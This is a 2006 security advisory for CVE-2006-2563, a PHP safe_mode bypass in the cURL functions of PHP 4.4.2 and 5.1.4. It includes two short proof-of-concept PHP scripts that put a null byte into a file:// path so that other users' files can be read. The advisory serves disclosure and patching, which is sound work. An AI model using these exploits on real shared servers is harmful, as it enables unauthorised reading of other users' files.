Bug: cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4 ( Ascii Version )

Search:
WLB2

cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4

Published
Credit
Risk
2006.05.27
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
N/A
CVE-2006-2563
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
2.1/10
2.9/10
3.9/10
Exploit range
Attack complexity
Authentication
Local
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[cURL Safe Mode Bypass PHP 4.4.2 and 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 15.5.2006
- -Public: 27.5.2006
from SECURITYREASON.COM
CVE-2006-2563

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique
PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated
pages quickly.

A nice introduction to PHP by Stig Sather Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend
website. Also, much of the PHP Conference Material is freely available.

The PHP safe mode is an attempt to solve the shared-server security problem. It is architecturally incorrect to try to
solve this problem at the PHP level, but since the alternatives at the web server and OS levels aren't very realistic,
many people, especially ISP's, use safe mode for now.

PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect and communicate to many different
types of servers with many different types of protocols. libcurl currently supports the http, https, ftp, gopher,
telnet, dict, file, and ldap protocols. libcurl also supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading
(this can also be done with PHP's ftp extension), HTTP form based upload, proxies, cookies, and user+password
authentication.
These functions have been added in PHP 4.0.2.

- --- 1. Safe Mode Bypass in cURL---
General problem exists in cURL functions, because are changed safe_mode, strings 0 (\x00) are change to "_".
Next bug exists in prefix file://, becaluse safe_mode checks only path at file:///.

Example:
- -Safe_Mode bypass exploit.1---
<?
$ch = curl_init("file://filethatyoudonthaveaccessto.php\x00".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
- -Safe_Mode bypass exploit.1---

Safe_mode checks only access only to __FILE__. But cURL include filethatyoudonthaveaccessto.php. So you can include any
files from directory where script is.
But in this exploit, you can only read files from directory where is this script. You can't use "/".

There is another conception for an exploit: if you have an access to a directory (rights) where you want to read files.
So, if you want to include files from "/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php",
you should make a dir like
"/home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/":

- -Safe_Mode bypass exploit.2---
<?
$ch =
curl_init("file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php\x00/../../../../../../../../..
/../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
- -Safe_Mode bypass exploit.2---

Safe mode checks access to file
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php_/../../../../../../YourFile.php"

And cURL include only
"file:///home/czarnobyl/www/directoryWITHyourRIGHT/fileFROManotherUSER.php"

because \x00 are ending path to file.

- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/ext/curl/

- --- 3. Greets ---

For: sp3x
and
p_e_a, l5x, Infospec, pi3, eax

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEd4bS3Ke13X/fTO4RAsCvAJ9eTxATfJRZZ2/DEoinl4R3Y+DZgACgvHQk
v8npsbXGJqmJRiAT9lnCyv8=
=mI80
-----END PGP SIGNATURE-----

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version